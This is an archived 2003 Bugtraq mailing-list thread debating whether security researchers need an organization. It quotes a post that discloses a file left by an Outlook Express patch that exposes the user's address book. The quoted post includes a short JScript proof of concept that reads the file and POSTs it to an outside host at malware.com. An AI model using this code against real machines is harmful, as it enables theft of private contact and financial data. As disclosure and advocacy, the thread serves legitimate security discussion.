FW: Security researchers organization

["Keving Wong" <kevin.wong () bbc co uk>]

> > I don't think those capable of actually doing research require hand holding by anyone.
  
I don't think there is any need to be so negative : -(
  
Bugtraq is such a group in existence already, but is more of informal
gathering of like-minded people. 
  
In Asia and the Middle East, Security Associates Institute
(http://sainstitute.org) operate a research group which now makes up
some 300+ security professionals, though these guys seem to going
down the road of "commercialism" nowadays and have no plans to be
"International"
  
Cheers
Kevin Wong

-----Original Message-----
Wrom: MNNSKVFVWRKJVZCMHVIBGDADRZFSQHYUCDDJBLVLMHAAL
Sent: Tuesday, November 18, 2003 7:31 PM
To: bugtraq () securityfocus com
Cc: NTBugtraq () listserv ntbugtraq com
Subject: Re: Security researchers organization




<!-- 

What I would like to see
created is an organization that would promote and protect the
interests of security researchers, plain and simple. There is
currently no organization that exists solely to guide, help and
represent security researchers on a larger scale, yet we can all
recognize the need.

 -->

I don't think those capable of actually doing research require hand
holding by anyone.


<!-- 

We are a wide, international and differing group of researchers, some
with malicious and others with altruistic intents for finding
security vulnerabilities. Despite our differences we have much in
common - we are deeply interested in advancing our knowledge of
security and information technology, we find vulnerabilities, we want
the vendor to know about these at some point in time and we want to
be accredited for our findings.

 -->

Can this not already be achieved by following the minimum requirement
of any one particular vendor. Or following any one of the number of
so-called disclosure guidelines already tabled.

While some may want accreditation and pat on the back, others may
want the continual flow of effluent onto the internet to cease. Some
want habitual offenders penalised. Monetarily. Some want an
authoritative body like a UL or CSA or VDE or SEMKO or BS to stamp
their mark on product entering the internet. 'REJECTED' for junk
product that finds it's way repeatedly onto the internet.

Allow me to give you an example of a habitual offender:

There is a peculiar file that appears on almost everyone's computers
since April of 2003. Peculiar enough in that all it is, is a tilde
"~". Inside that file is the entire contents of the user's address
book. In fact, the file is exactly that. The user's address book.
Simply adding the extension of  *.wab to it, opens up none other than
the Windows Address Book. All names, addresses and whatever
critically private information one puts in there. Some people even
put their banking and credit card details in there believe it or not.

This peculiar little file is an oddity created by the April 2003,
Cumulative Patch for Outlook Express (330994). Now seven months ago.
A most useful file in that it is created in a number of well known
places including "C:\". Knowing the file name and location makes it
quite easy to 'steal' this file and  invade the privacy of the user
of the computer where it still resides today. Some seven months after
the vendor knowing full well about it.  [I believe there is a pending
lawsuit against the same vendor along the same lines at this time]. 

You see:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "file:///C:/~",0);
x.Send();
var y = new ActiveXObject ("Microsoft.XMLHTTP");
y.Open("POST", "http://www.malware.com/forthetaking.php";, false);
y.Send(x.responseBody);

Will get and post that file. With a little bit of effort and timing,
all one needs to do is steal that file and invade the privacy of the
"customer" ! And who's fault will that be? Mine for providing this
glaringly obvious scenario 'for free' or the vendor sitting on their
hands for seven months thinking about it for a fee.

REJECT !  the product and keep it off the internet ! 

-- 
http://www.malware.com